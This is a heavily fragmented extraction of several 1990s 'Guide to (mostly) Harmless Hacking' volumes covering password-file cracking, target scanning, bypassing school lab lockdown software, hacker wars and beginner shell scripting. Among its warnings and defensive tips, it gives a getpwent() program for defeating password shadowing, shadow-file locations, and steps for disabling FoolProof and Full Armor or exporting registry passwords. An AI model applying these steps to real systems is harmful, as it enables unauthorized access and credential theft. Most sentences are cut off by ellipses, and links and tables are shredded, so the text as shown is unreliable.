blow your socks off, in the Bugtraq archives
...
” These archives are at http://www
...
org/lsv-archive/bugtraq
...
Of course the password file will be
encrypted
...


But how do you get password files? A good systems administrator will hide them well so even users on the
machine that holds them can’t easily obtain the file
...
This is one reason that
most computer breakins are committed by insiders
...
Why should
this be so? Think about what happens when you log in
...


What the computer does is perform its encryption operation on the password you enter and then compare it
with the encrypted entries in the password file
...
You job as the would-be cracker is to figure out the name of this file and then get
your target computer to deliver this file to you
...
R
...
C
...
com>), follows
...
R
...
C
...
text
...
]
step #2
To defeat password shadowing on many (but not all) systems, write a program that uses successive calls to
getpwent() to obtain the password file
...
h>
main()
{
struct passwd *p;
while(p=3Dgetpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p ->pw_name,
p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir,
p->pw_shell);
}
Or u can Look for the Unshadowed Backup
...
It may be obtained from http://
www-personal
...
umich
...
0s
/tcb/files/auth/?/
*
BSD4
...
passwd
*
ConvexOS 10
/etc/shadpw
*
ConvexOS 11
/etc/shadow
*
DG/UX
/etc/tcb/aa/user/
*
EP/IX
/etc/shadow
x
HP-UX
/
...
1
/etc/shadow
*
OSF/1
/etc/passwd[
...
pag]
*
SCO Unix #
...
x
/tcb/auth/files/*
of username>/
SunOS4
...
adjunct
##username
SunOS 5
...
0
/etc/shadow
x
System V Release 4
...
dir|
...
]
**************************************************
So let’s say you have managed to get an encrypted password file
...
It is available at
ftp://ftp
...
bishkek
...
tgz
or http://iukr
...
su/crack/index
...
rc
...
ca/samfaq
...
5
...
L0pht
...
It comes with source so you can build it on just
about any platform
...
com and weld@l0pht
...

Another Windows NT password cracker is Alec Muffett's
Crack 5
...
sun
...
ac
...
10
...
One way to
do this is to get a list of users by fingering your target computer
...
1 No
...
The verify command in sendmail is another way to get user
names
...

If finger and the verify commands are disabled, there is yet another way to get user names
...

If password cracking doesn’t work, there are many -- way too many -- other ways to break into a computer
...


1
...
Find out what operating system it runs;
whether it is on a local area network; and what programs it is running
...

For example, if you can get physical access to the computer, you can always get control of it one way or
another
...
What this means, of course, is that if you have
something on your computer you absolutely, positively don’t want anyone to read, you had better encrypt
it with RSA
...
Then you should hope no one discovers a fast way to factor numbers (the
mathematical Achilles Heel of RSA and PGP)
...
In fact, the vast majority
of computer breakins are done by people who are employees of the company that is running that LAN on
which the victim computer is attached
...

Important note: if you have even one Windows 95 box on your LAN, you can’t even begin to pretend you
have a secure network
...

If the computer you have targeted is on the Internet, your next step would be to determine how it is
connected to the Internet
...

***************************************************
Newbie note: TCP/IP ports are actually protocols used to direct data into programs called “daemons” that
run all the time an Internet host computer is turned on and connected to the Net, waiting for incoming or
outgoing data to spur it into action
...
An example of a
daemon that can do interesting things when it gets data under SMTP is sendmail
...

For a complete list of commonly used TCP/IP ports, see RFC 1700
...
internic
...
txt
****************************************************
2
...
Sure, lots of people who are ignorant
on operating systems break into computers by using canned programs against pitifully vulnerable boxes
...
We assume you are better
than that
...
You’re just a computer vandal
...
Study the ways other people have broken into a computer with that operating system and software
...
netspace
...
html
...
rc
...
ca/index
...

A cheap and easy partial shortcut to this arduous learning process is to run a program that scans the ports
of your target computer, finds out what daemons are running on each port, and then tells you whether there
are breakin techniques known to exist for those daemons
...
You can
download it from ftp://ftp
...
net/pub/defcon/SATAN/ or a bazillion other hacker ftp sites
...
It is offered by Internet Security Systems of
Norcross, Georgia USA, 1-800-776-2362
...
You can reach ISS at http://www
...
net/
...
The "Localhost" Internet Scanner SAFEsuite
is set to only run a security scan on the Unix computer on which it is installed (hack your on box!) You can
get it from http://www
...
com/iss
...
You can get a free beta copy of their scanner for Win NT at
http://www
...
net/about/whatsnew
...

In theory ISS programs are set so you can only use them at most to probe computer networks that you own
...

If you want to get a port scanner from a quiet little place, try out http://204
...
52
...
This offers the
Asmodeus Network Security Scanner for Windows NT 4
...

In most places it is legal to scan the ports of other people’s computers
...

For example, recently an Irish hacker was running “security audits” of the Emerald Island’s ISPs
...
He emailed each of his targets a list of the vulnerabilities he found
...

“But why give him a hard time for just doing security scans? He may have woken up an administrator or
two,” I asked my friend
...

The way I get around the problem of getting people mad from port scanning is to do it by hand using a
telnet program
...
This has the advantage
that most systems administrators assume you are merely curious
...
But since I’m sure you are only going to try to break into
computers where you have permission to do so, you don’t need to know how to spoof your IP address
...
sekurity
...

******************************************************
4
...

But aren’t hackers brilliant geniuses that discover new ways to break into computers? Yes, some are
...
That’s why, in the book
Takedown, some hacker (maybe Kevin Mitnick, maybe not) broke into Tsutomu Shimomura’s computer to
steal a program to turn a Nokia cell phone into a scanner that could eavesdrop on other people’s cell phone
calls
...
Do a web search for “hacker” and “haxor”
and “h4ck3r” etc
...
”
Unfortunately, you may be in for an ugly surprise or two
...

For example, the other day a fellow who shall remain nameless wrote to me “I discovered a person has been
looting my www dir, where I upload stuff for friends so I am gonna leave a nice little surprise for him in a
very cool looking program ;) (if you know what I mean)”
But let’s say you download a program that promises to exploit that security hole you just found with a Satan
scan
...
Your next task may be
to get this exploit program to compile and run
...
And there are many different flavors of Unix
...
(If none of this makes sense to you, see the GTMHHs
on how to get a good shell account
...

It is also possible that the guy who wrote that breakin program may have a conscience
...
So they made a few little teeny weeny changes to
the program, for example commenting out some lines
...
/Ms
...
And as we all know, computer
programmers would never, ever do something mean and horrible to someone else’s computer
...

5
...
The two most common languages for exploit programs are probably C (or C++) and
Perl
...
A good tip off that this may be your problem
is a file name that ends with “
...

********************************************
So, does all this mean that breaking into computers is really, really hard? Does all this mean that if you break
into someone’s computer you have proven your digital manhood (or womanhood)?
No
...
But if you break into a poorly defended computer
run by dunces, all you have proven is that you lack good t aste and like to get into really stupid kinds of
trouble
...

Remember this! If you get busted for breaking into a computer, you are in trouble big time
...
Even if you say you made the computer better while you were prowling around in it
...
And -- do you have any
idea of how expensive lawyers are?

I haven’t even hinted in this tutorial at how to keep from getting caught
...
So if you had to read this to learn how to break into computers, you
are going to wind up in a world of hurt if you use this to trespass in other people’s computers
...
We’ll also make new announcements as we discover
them
...
sekurity
...
No one has managed to break it when attacking from
the outside
...
You may have to discover a new exploit to
breach its defenses
...
0 with sendmail 4
...
Show some chivalry and please don’t
beat up on the helpless, OK? And stay out of jail or we will all make fun of you when you get caught
...
We haven’t even touched on
topics such as how to look for back doors that other crackers may have hidden on your target computer, or
keystroke grabbers, or attacks through malicious code you may encounter while browsing the Web
...
) But maybe some of you ubergenius types
reading this could help us out
...
Get busted for trying this out on some Lower Slobovian
businessman’s computer and we will all make fun of you, I promise! That goes double for Upper Slobovian
boxes!!
____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol
...
6
How to Be a Hero in Computer Lab
____________________________________________________________
If you are a student, you know you can get into trouble if you hack your school’s computers
...
You may even get their permission to try break-in techniques
...

· Keep clueless kiddie hackers from messing up your school computer system

************************************************************
This Guide will give you some tips for safely proving just how good you are, and maybe even showing
your hacker teacher buddies a thing or two
...

************************************************************
You can mess up your life warning: In most countries kids don’t have nearly the legal protections that
adults have
...
Even if the authorities don’t have very good proof of your guilt
...
Arghhh!
************************************************************
First task of this Guide, then, is how to find teachers who would love to play hacker games with you and
give you free run of the schools computer systems
...

Coyote suggests, “in many cases you may find that if you prove yourself responsible (i
...
: not acting like a
jerk in class and not hacking to be cool), it will be easier to gain the trust of the teacher and subsequently
gain the job helping with the systems
...
”
Here’s the first thing you need to remember
...
If they get mad at hackers, it is
because computer vandals keep on messing things up
...

Think about it
...
The problem is -- will they dare to trust you?
Karl Schaffarczyk warns, “I nearly got chucked out of school (many years ago) for pulling up a DOS prompt
on a system that was protected against such things
...
The minute they realize you know how to get to DOS, they know you could mess things up so bad
they will have to spend a sleepless night -- or two or three -- putting that computer back together
...
Imagine that!
So if you really want to work a deal where you become supreme ruler and hero-in-chief of your school’s
computers, don’t start by getting caught! Don’t start even by showing your teacher, “Hey, look how easy it
is to get a DOS prompt!” Remember, some authorities will immediately kick you out of school or call the
cops
...
You can’t really blame them, either, when you
consider those news stories
...

- 13 FEBRUARY 1997 Hackers are reported to be using servers at Southampton University to circulate
threatening emails (that)
...

(c) VNU Business Publications Limited, 1997
NETWORK NEWS 7/5/97 P39 A teenager was fined an equivalent of US$350 for paralysing US telephone
switchboards
...

(C) 1997 M2 Communications Ltd
...

(C) 1997 M2 Communications Ltd
...
For example, in 1997, authorities at a naval base at first blamed attackers using high-energy
radio waves for computer screens that froze
...

So instead of getting mad at teachers who are terrified of hackers, give them a break
...
Plus which they have probably spent a lot of time fixing messes made by
kiddie hackers
...
Your job is to show them you can make
life better for them by giving you free run of the school computers
...

If you offer to help for free, and if you convince them you are responsible, you can get the right to have root
(or administrative) access to almost any computer system
...
I told him I knew a high school sophomore who had
been busted for hacking but had reformed
...
Next day they did the deal
...
In exchange, those kids fix anything that goes wrong with that box
...
Find an overworked teacher
...
Offer to show him or her that you
know enough to help take care of those computers
...
Just in case your teacher is the kind who gets
scared by all those hacker news stories, don’t start out by talking about breaking in! Instead, start with
showing them, with their permission, a few cheap tricks
...

For starters, what could be more harmless -- yet effective at showing off your talents -- than changing the
animated logos on IE (IE) and Netscape?
You could do it the easy way with Microangelo, available from
ftp://ftp
...
com/pub/impactsoft/ma21
...
But since you are a hacker, you may want to impress your
teachers by doing it the hacker way
...

2) Click “image,” then “attributes
...

4) Make a series of pictures, each 40x40 pels
...
Then cut and paste each one into the 40x480 image
...
The next three
are shown once when a download starts, and the rest are played in a loop until the download is done
...


6)Now run the Registry editor
...
One way is to click “start,” then “programs” then “MS-DOS,” and then in the MS-DOS window
with the C:\windows prompt give the command “regedit
...
” Type “Brandbitmap” in the find window
...
Type the path and file name of your custom
animated graphic into it
...
Your teacher is impressed
...
This is easy
...
Windows Explorer will then automatically revert to the saved graphic in BackBitmap
...
Did you know that Internet Explorer (IE)
can be used to break some Windows babysitter programs? Your school might be running one of them
...

Yes, you could just get to work on those babysitter programs using the tips of the GTMHH on how to
break into Win95
...
The
advantage of using IE when your teacher is anxiously looking over your shoulder is that you could just
“accidentally” stumble on some cool stuff, instead of looking like a dangerous hacker
...

Besides, if it turns out the security program you try to override is well enough written to keep IE from
breaking it, you don’t look like a dummy
...

************************************************************
The dirty little secret is that IE actually is a Windows shell program
...
From IE you may launch any program
...

Yes, from the IE shell you can run any program on your computer -- unless the security program you are
trying to break has anticipated this attack
...
But don’t try that just yet!
************************************************************
Newbie note: A shell is a program that mediates between you and the operating system
...
The security
problems that are plaguing IE are mostly a consequence of it turning out to be a shell
...
This makes them safer to use
...
Experiment and have fun!
************************************************************
To use IE as a Win95 shell, bring it up just like you would if you were going to surf the Web
...
You don’t need to be online
for this to work
...
In the space where you would normally type in the URL you want to
surf, instead type in c:
...
Now for fun, click “Program Files” then click
“Accessories” then click “Paint
...
Now paint your teacher who is watching
this hack surprised
...
Click on the Windows folder, then click on
Regedit
...
Export the password file (it’s in HKEY_CLASSES_ROOT)
...

Remember, the ability to control the Registry of a server is the key to controlling the network it serves
...

In a few hours the Secret Service will be fighting with the FBI on your front lawn over who gets to try to
bust you
...

No, maybe it would be a bit better to tell your teacher that if you can edit the registry, you can get total
control over that computer
...
Suggest that the school delete IE from all its computers
...

If you actually do edit the Registry, you had better know how to revert to its backup, or else undo your
changes
...

Remember, the objective is to prove to your teachers you can cut how much work they have to do!
What if the school babysitter program won’t let you run regedit
...
com
...

If you have gotten this far with IE, next try entering r:/ or w:/ or z: etc
...
Be sure to do this with your teacher watching and with her permission to try to access
network computers
...
This is because you have just taken over the entire school LAN
...

By now you have a great shot at getting a volunteer job running the school’s computer systems
...

Cheap Tricks with Microsoft Office
You also can run a Windows shell from several Microsoft Office programs
...

The following exploit works with Microsoft Word, Excel, and Powerpoint
...
”
2) This brings up a window which includes a button labeled “run
...
exe! (That is, unless the security program you are trying to break has a way to
disable this
...
The “run” button only gives a few choices
...

But File Manager is also a Windows shell
...
(That is, unless the security
program you are trying to break has a way to disable this
...
One young hacker reports his school uses shift-alt-X (hold
down the shift and alt keys at the same time, then press the “x” key
...


If you get the hotkey right, a sound may play, and a lock in the lower-right corner should open for 20-30
seconds
...
“My computer
science teacher asked me to show her exactly HOW I managed to print the ‘the universe revolves around
me’ image I made to all the network printers in the school
...

************************************************************
You can get punched in the nose warning: Dante was lucky that his teacher was understanding
...

************************************************************
Here is how Dante -- and anyone -- may disable FoolProof
...

Warning -- don’t try the soldering iron bit
...

3) Now you can edit the autoexec
...
sys files
...
) In config
...
bat, delete fptsr
...

4) Run regedit
...
You have to remove FoolProof from the Registry, too
...

5) Find the Registry backup files and make copies with different names just in case
...
FoolProof won’t load
...

You are now the school hero security expert
...
It presented
itself as a challenge
...
” -- Dave Manges
...
vbx
2) OK
...
vbx
3) Just because I can't write to the hard drive doesn't mean I can't edit something already there, delete the
first character from the file
...

5) Save the File and restart the computer, it should come up with an error like "Unable to Initialize Full
Armor"
...

Again, remember to back up all files before changing them so you can put the computer back the way you
found it
...
But this can be a tough job
...
If even one kid were to complain to her parents that she had seen
dirty movies running on other kid’s monitors in computer lab, your school would be in big trouble
...


But once again you can be a hero
...
They may be surprised to find out the block lots more than naughty
pictures
...

If your school is running CYBERsitter, you can really beat up on it
...
But you can download a program to
decrypt this list at: http://peacefire
...
shtml
...
)
When your teacher discovers the hidden political agenda of CYBERsitter, you are a hero
...
If so, you can probably find other teachers in your school
who will be appalled by CYBERsitter
...
If a site
hasn’t gone to the effort of getting a certificate, IE can keep you from seeing it
...
But instead of doing
this, how about directing your teacher to http://peacefire
...

How to Break into Absolutely any School Computer
As you know from Chapter 2, you can break into any computer to which you have physical access
...

There are only a few possible ways for these programs to work
...

If this doesn’t work, if you can get into DOS, you can edit any files
...
Or you may only need to access regedit
...
You can run it from either DOS or,
depending on how good your problem program is, from Windows
...
bat, config
...
pwl or
...
Look for lines with
suspicious names that remind you of the name of the program you want to disable
...
But this will make your teachers throw fits
...
If you want
to be a hero, make sure that you can always return any school computer to the way it was before you
hacked it
...
This will get rid of anything lingering in RAM that could defeat your efforts
...
You would be amazed at all
the things clumsy or malicious users can do
...
Here are some basic precautions that you can offer to your teachers to lock down school
computers
...
)
1) Disable all boot keys
...
If it already has a password, change it
...

3) Remove any programs that allow the user to get to regedit or dos
...

5) Remove programs that can’t be made safe
...
(The passwords
can be easily grabbed and decoded
...

With experimentation you will figure out much more for yourself
...
But at least you will be able
to keep secure enough that those students who do break in will know enough to not do anything disastrous
by accident
...

You may also have a problem with school administrators who may feel that it is inconvenient to set up such
a secure system
...
Upgrading to WinNT will
cost money
...

Are you ready to turn your hacking skills into a great reputation at school? Are you ready to have the
computer lab teachers begging to learn from you? Are you ready to have the entire school computer system
under your control -- legally? You will, of course, only use the tricks of this Guide under the supervision of
an admiring teacher, right? It sure is more fun than expulsion and juvenile court!

Contents of Volume 4:
Hacker Wars: Fighting the Cybernazis
__________________________________________________________
Guide to (mostly) Harmless Hacking
Vol
...
1: Hacker Wars: Fighting the Cybernazis
__________________________________________________________
There is a war underway in cyberspace
...
On the side of repression are governments who fear the untrammeled freedom of speech

that is today's Internet -- and several bands of computer criminals who have the nerve to call themselves
hackers
...
They are the spiritual descendants of the Nazis of the Germany of the 1930s,
who burned books in their campaign to keep the German people ignorant
...
In some cases cybernazis also target
their victims with massive credit card fraud, death threats, and worse
...

It’s a war that has targeted this Happy Hacker email list ever since we started it in August 1996
...

**********************************************************
In this Guide, the first of the Information Warfare Volume, you will learn:
· what are hacker wars
· Web page hacking
· denial of service
· sniffing
· social engineering
· ISP hostage taking
· the damage hacker warriors may do to bystanders
· why you may get hit someday
· how to get into a hacker war (some people want to!)
· how to keep from getting caught -- NOT!
· defense techniques that don’t break the law
**********************************************************
The most serious battle in these wars took place Oct
...
It targeted Bronc Buster
...
org) and his
association with Happy Hacker
...
4, 1997 that attempted to make it look
like Bronc was a self-confessed pedophile, into scorched-core warfare that shut down the Succeed
...
They attacked Succeed
...

I helped muster both the FBI and volunteer technical help from an Internet backbone provider to aid
Succeed
...
If you, too, get hit by the cybernazis,
too, tell me about it
...

************************************************************
I don't want to get sued disclaimer: Just because jericho and Modify acted as spokesmen for the attackers,
and in the case of jericho claimed considerable knowledge of technical details of the attacks, does not mean
they are guilty of anything
...
I am not saying they did it
...

In this GTMHH No
...
But an
understanding of hacker war will prepare you for No
...
3, which will lay the foundation for becoming an
international information warfare fighter
...
There are several types of
hacker war tactics
...

Web Page Hacking
Lots of people ask me, “How do I hack a Web page?” Alas, gentle reader, the first step in this process
ought to be physiologically impossible and unsuitable for description in a family publication
...
Amazingly, some Web sites accidentally offer write permission to anyone (world
writable)! If so, all the hacker warrior need do is create a bogus Web page, give it the same name as the
desired page on the Web site to be hit, and then transfer it via ftp
...

Hacked web pages usually consist of dirty pictures and bad language
...
Wise political analysis, witty repartee and trenchant satire have been absent from every one I
have ever seen -- with the single exception of one hack in Indonesia by the East Timor freedom fighter
group
...

But maybe my standards are too high
...
Parental discretion and antinausea medicine
advised
...
skeeve
...
2600
...
They are quickly fixed
...

If you believe in freedom enough to respect the integrity of other people's Web sites, and are serious about
making a political statement on the Web, the legal and effective way is to get a domain name that is so
similar to the site you oppose that lots of people will go there by accident
...
org
was hilarious, clean, effective, and legal
...
org was also taken by parody makers
...
But they were widely reported
...
net
...
In fact, all you need to do is promise to buy a domain
name
...

************************************ ***********************

You can get punched in the nose by a giant corporation warning: If you get a parody domain name so you
can put up a Web site that makes fun of a big corporation, even though you are not breaking the law, you
may get sued
...
But you may be
able to get lots of good publicity by alerting reporters to your plight before taking down your Web site
...

***********************************************************
If you want to keep your Web site from being attacked, I recommend using a company that does nothing
but host Web pages
...
This is because the more services an
Internet service provider offers, the more vulnerabilities it exposes
...
com is
hosted by a Silicon Graphics box that does nothing but run a Web serv er
...
com email, by
contrast, is hosted on a machine that does nothing but host a POP (post office protocol) server
...

DOS Attacks
A second type of hacker war is denial of service (DOS)attacks
...

Spammers are a favorite target of DOS warriors
...
The weapon of choice on both sides is the mail bomb
...
1997), hackers fought a massive war against spammer kingdom Cyber Promotions, Inc
...
Cyberpromo went to court to force AGIS to
give it Internet access (AGIS eventually won and kicked off Cyberpromo)
...

While the vandals who attacked AGIS probably think they have a good cause, they have been doing more
damage than any hacker war in history, and harming a lot of innocent people and companies in the process
...
” So, although the attacks on AGIS apparently consisted of
computer break-ins, the use of the break-ins was to deny service to users of AGIS
...
It may include fiber
optics and satellites and new protocols such as Asynchronous Transfer Mode
...

********************************************************
********************************************************
You can go to jail warning: Attacking an Internet backbone provider is an especially easy way to get a long,
long stay in prison
...
http://www
...
com/~fyodor/ has a
good list of these NT DOS vulnerabilities, while Bronc Buster’s http://showdown
...
Please note: we are pointing these out so you can study them or test your own computer or
computers that you have permission to test
...


********************************************************
You can go to jail, get fired and/or get punched in the nose warning: DOS attacks in general are pathetically
easy to launch but in some cas es hard to defend against
...
“Code kiddie! Lamer!”
********************************************************
Sniffing
Sniffing is observing the activity of one’s victim on a network (usually the Internet)
...

Sniffer programs can only be installed if one is root on that computer
...
Your email, telnet, ftp, Web surfing -- and any passwords
you may use -- may go through 20 or more computers on their way to a final destination
...
If you really, seriously don’t want some cybernazi watching
everything you do online, there are several solutions
...
However, this will not protect the email itself from snoopers
...
You can also set up an encrypted tunnel from one
computer on which you have a shell account to a second shell account on another computer -- if both are
running Secure Shell
...
unc
...
2
...
tar
...
cs
...
fi/ssh/#ftp-sites
...

For a client version that will run on your Windows, Mac or any version of Unix computer, see the
DataFellows site at http://www
...
com/
...

To get on the ssh discussion list, email majordomo@clinet
...
"
But ssh, like APOP will not protect your email
...
PGP is popular and can be
purchased at http://pgp
...
I recommend using the RSA option
...

************************************************************
Newbie note: Encryption is scrambling up a message so that it is very hard for anyone to unscramble it
unless they have the right key, in which case it becomes easy to unscramble
...
Worst of all, RSA depends upon the unprovable mathematical hypothesis that there is
no polynomial time bounded algorithm for factoring numbers
...
Way to go, Sneakers writer/producer Larry Lasker!

************************************************************
************************************************************
You can go to jail warning: In many countries there are legal restrictions on encryption
...
If we are serious about freedom of speech, we must find ways to keep our communications
private
...

************************************************************
Social Engineering
As we saw in the GTMHH on how to break into computers, social engineering usually consists of telling
lies that are poorly thought through
...
A really skilled social engineer can get almost any
information out of you without even telling a lie
...
He provided great tech support
...
If he had been smart, he would have gotten a real tech support job, but then I can never figure
out some of these haxor types
...
Then they
trumpet around about how this proves the victim is a lamer
...
Of course, you may get a
domain name, set up a computer with lots of security and hook it directly to an Internet backbone provider
with a 24 hr phone connection
...
But as we learned from the AGIS attacks, even Internet backbones can get taken down
...
Yeah, right
...

While it is hard to break into almost any computer system from the outside, there are vastly more exploits
that will get you superuser (root) control from inside a shell account
...

You can increase your security by using an ISP that only offers PPP (point to point) accounts
...
Thanks, cybernazis, for ruining the Internet for the
rest of us
...

********************************************************
Newbie note: A shell account lets you give Unix commands to the computer you are on
...

********************************************************

Because it is easy to break into almost any ISP, haxor d00d cybernazis think it is kewl to take an ISP hostage
by repeatedly breaking in and vandalizing it until the owner surrenders by kicking the victim of the attacks
off
...
net in Oct
...

*******************************************************
You can go to jail warning: I usually fubar the names of ISPs in these guides because so many haxor types
attack any computer system I write about
...
net is a real name
...
Just
remember that we have boobytrapped the heck out of it
...

*******************************************************
Why Should I Give a Darn? -- Ways Bystanders Get Hurt
To most people, hacker wars are Legion of Doom vs
...
Interesting, but like
reading science fiction
...

Yet chances are that you may already have been brushed by hacker war
...
Please try
again later”? Sent email that disappeared into cyberspace without a trace? Gotten email back with a “User
unknown” or worse yet, “host unknown” message? Been unable to surf to your favorite Web site?
It could have been technical error (cough, cough)
...
A cardinal rule of online
services is to never, ever admit in public to being hacked
...
This is because there are cybernazi gangs that, when they hear of an online
service under attack, join in the attack
...
However, what they accomplish is to make it hard for small companies
to compete with giants such as America Online
...
So with the cybernazis rampaging against the little Internet service providers, it is
not surprising that so many of them are selling out to the giants
...
In fact, I suspect
cybernazis are trying to drive the small competitors out of business solely on the general principle that they
hate freedom of anything
...

For example, in Sept
...
In Oct
...
net was shut down by a team of hackers that deleted not just Bronc's but also over 800 user
accounts
...

On June 4, 1997, hacker wars made yet another quantum leap, shutting down the Internet backbone service
provider AGIS in retaliation for it allowing Cyberpromo and several other spam empires to be customers
...
Pearl Harbor
...
Famine
...


You think this is a ridiculous exaggeration? Those of use who have been in the bullseye of the
cybernazis find this future easy to believe
...
Someone must be
listening, because in September 1997 an industry group, formed in the wake of hearings by the US Senate’s
Permanent Subcommittee on Investigations, appointed Schwartau team leader, Manhattan Cyber Project
Information Warfare/Electronic Civil Defense (see http://www
...
com/mcp/ and
http://www
...
com)
...
These attacks have included massive credit card fraud, tampering with his credit rating, turning
off his home power and phone, and even tampering with the local emergency services dispatch system so
that all ambulance, fire and police calls were directed to his home instead of to those who called 911 for
emergency help
...
The cybernazis, as Schwartau
discovered, were willing to even risk the lives of people who had nothing to do with him
...

Why You May Get Hit
Hacker war happens to other people, right? Spammers get hacked
...

But if you behave politely around computer criminals, you are safe, right? OK, as long as you don’t live in
the neighborhood of one of us Internet freedom fighters like Schwartau or me you are safe
...
Dead wrong
...
We’re talking
the Internet Chess Club
...

In mid Sept
...

There have bene many bystanders hit with the wars against this Happy Hacker list
...
For example, on Dec
...
org with message
"subscribe dc-stuff) saying “I think they (or maybe 'we') will survive, Carolyn's book
...
Ask not what the network can do for you, ask
what you can do for the network
...
I'm an activist, and I won't stop my activ ism just because I know others will take it
too far
...
Ask Josh
Quittner (author of Masters of Deception); for a while there, he had to change his (unlisted) phone number
literally every two weeks because of the nightly anonymous calls he was getting
...
Ask John Markoff (coauthor of the hacker best-seller Takedown); he can't even let people
know what his email account is or he gets spammed the next day
...
All I'm doing is telling you what's coming
...
There is a darker
element in my culture, and you're going to meet it if you keep going
...
” Yeah, right
...


Five days later, while it was still dark on Christmas morning, the owner of the Southwest Cyberport ISP
where I had an account was woken by an alarm
...
No one using that ISP could get
email any more
...

jericho surfaced as the public spokesman for the attacker, claiming intimate knowledge of his techniques and
motivations
...
28, someone cracked the dedicated box that Cibola Communications had been
providing us at no cost to run the Happy Hacker majordomo
...
The attackers also
wiped the system files from a computer at the University of Texas at El Paso that I was using for research,
and sent threats to all email addresses on that box
...
It was not the first or
last time that GALF has struck Happy Hacker
...
That's life around here
...

*********************************************************
Newbie note: In case you are wondering whether you can get killed in one of these battles, I have found no
reports, not even rumors, of any hacker war murders
...
Like sending an ambulance that could save a dying child to the home of an
Internet freedom fighter instead
...
Despite what you may hear, those of us hackers who are not computer
criminals cooperate enthusiastically with law enforcement
...
How do I get in?”
I get email like this all the time
...
The excitement! The opportunity to go mano a mano with bad dudes
and prove you are better than them!
There is some truth to this view
...
Believe me, if we catch the Succeed
...
But before you make the
decision to join us freedom fighters, count up the cost
...

But I’ve stood up to them
...
So if you want to attract a hacker war, and
believe you are as tough or tougher than me, be my guest
...
You’ll find plenty of things in the next Guides in
this series that will help you survive even the most determined hacker war
...

So just how do you get into a hacker war? The easiest way is to attend a hacker convention
...
“He said, he doesn’t like the
way you look
...


How to Keep from Getting Caught -- NOT!
So you want to be the attacker in a hacker war? So you think you can keep from getting caught? According
to jericho, writing in his “F***ed Up College Kids” ezine, “You have media whores like Carolyn Meinel
trying to teach people to hack, writing guides to hacking full of f***ups
...
”
I agree with jericho, if you decide to become a computer criminal in a hacker war, I’m not talented enough to
teach you how to keep from getting caught
...
I’ll tell you exactly why, too
...
” He makes a big deal about how hackers can keep from getting busted by deleting or modifying
log files
...
Right
...
Sure,
an ordinary sysadmin can’t restore a deleted file on a Unix system
...
They can
restore them regardless of operating system
...
I know those people
...
Guess who’s toast:):):)
Then there is surveillance
...
”
What he doesn’t know is that thanks to a court order inspired by his boasts, someone is sitting in a van a
hundred yards away -- picking up every keystroke
...
Or picking up the signals that
run down the power cord of your computer
...
Commit one easy-to-prove federal
felony, let’s say posting someone’s stolen email on one’s public ftp server (who do we know who has done
this?), and the Feds have lots of bargaining power against him
...
Not because I don’t know how
...
The 31337 d00dz who tell you otherwise are seriously ignorant
...
net attackers are will wind up in jail
...
Perhaps not for that crime
...
It is only a matter of picking which of their many crimes will hold up best in court,
and who will give evidence against whom
...
“My buddies and I break the law all
the time and we’ve never been busted
...
”
It’s just a matter of time
...
Or make the decision to obtain
their “get out of jail free” cards by informing on their gang before their day of doom comes up
...

********************************************************
If you happen to be a cybernazi who is having second thoughts, and would like help making a deal with the
authorities, please contact me anonymously using my pgp key:
-----BEGIN PGP PUBLIC KEY BLOCK----Version: PGP for Personal Privacy 5
...
But
remember, these are only the most basic of protections
...

Top Ten Beginner Defenses in Hacker Wars
10) Backup, backup, backup
...

8) Assume your phone is tapped
...
Use Secure Shell instead
...
It should be long, not a name or a word from a dictionary, and should include
numbers and/or characters such as !@#$%^&*
...

5) This applies to shell accounts: assume your attacker will get root control anyhow, so your password
won’t do you any good
...

4) Do you use the Pine or Elm email programs? Don’t keep email addresses in your shell account
...
GALF specializes in this tactic
...
You never know when it may sprout rude body parts or naughty words
...
Best of all,
use a MacOS web server
...
Don’t even *think* of using ActiveX or Internet Explorer
...
It will take many of us to win the battle against those who want to pick
and choose whose voices will be heard on the Internet
...
5 Programmers' Series
No
...
If you have never programmed in your
life, today, within minutes, you will become a programmer
...
And
even if you are already a programmer, in this Guide you just might discover
some new tricks that are lots of fun
...
In fact, many el1te haxor types claim they don't need to know how
to program, since computer programs that do kewl stuph like break into or
crash computers are available for download at those HacK3r Web sites with
the animated flames and skulls and doom
-laden organ music
...
Breaking into and
crashing other people's computers is not hacking
...
tcshrc,
...
files
...
But my
husband at the time, H
...

Keith was one of the earliest of hackers, and a hacker in the pure sense,
someone who wasn't afraid to try unusual things to save memory (a scarce

resource on even the biggest computers of the 1970s) or cut CPU cycles
...
" He insisted that I sign up for a course in Fortran at the
University of Arizona
...

It was so fun that I added code to detect input of characters that weren't
in the alphabet, and to give an error message when it found them
...
I was hooked
...

I discovered you don't have to be a genius to become a professional
programmer
...

******************************************************
Evil Genius tip: The Turing Machine Halting Problem theorem says that it is
impossible to thoroughly debug -- or even explore -- an arbitrary computer
program
...

For a more rigorous treatment of the Turing Machine Halting Problem theorem
-- yet written in language a non-mathematician can understand -- read the
"Giant Black Book of Computer Viruses" by Dr
...
This book will also teach you how to write the most deadly
viruses on the planet -- or programs to fight them! You can order it from
http://www
...
com
...
But it is the most
electrifying computer manual I have ever read!!!!
********************************************************
That is the heart of the hacker spirit
...

Kode kiddies who think breaking into computers and typing f*** every third
word while on IRC are not hackers
...

But if you aspire to become a true hacker, you will become a programmer, and
reach for the stars with your code
...
Shell
programming is writing a file that holds a sequence of Unix commands, which
you can run in your shell account by typing in only one line
...
You

can get one for free at http://sdf
...
org
...
For a full service shell account, check out
http://rt66
...
Yes! They have ssh logins!
For details on how to use a shell account and instructions on lots of fun
Unix commands, see the GTMHHs on shell accounts at
http://techbroker
...
html
...
The basic idea is that you write a
series of DOS commands and save them with a file that ends with the
extension "bat
...
bat
...
(Note: if you are in a different directory from my file
...
")
Unix -- an operating system that was created long before DOS -- can do
something very similar to a DOS batch file
...
Then you save it as a file with
permissions that make it executable
...
It means that when you type the name of that file, the
computer looks inside and does what your file tells it to do
...
For example, you
could set the permissions on your shell account file so that only someone in
your account could execute it
...

***************************************************
But there is one huge difference between DOS and Unix commands
...
In Unix, they would
be two totally different commands
...

How to Create and Run a Script
Why are we starting with shell script programming? The reason is that they
are easy
...
So easy, there are several ways to make
them
...

1) Open an editor program
...
At the prompt in
your shell account, simply type in "pico hackphile
...
If you don't like that name, open Pico
with the name you like, for example "pico myfilename
...

********************************************************
Evil genius tip: If your shell account is half-way decent, you will have
Pine and it will allow you to choose whatever editor you want for composing
email
...
But you may configure it to use other editors such
as the far more powerful vi or emacs
...
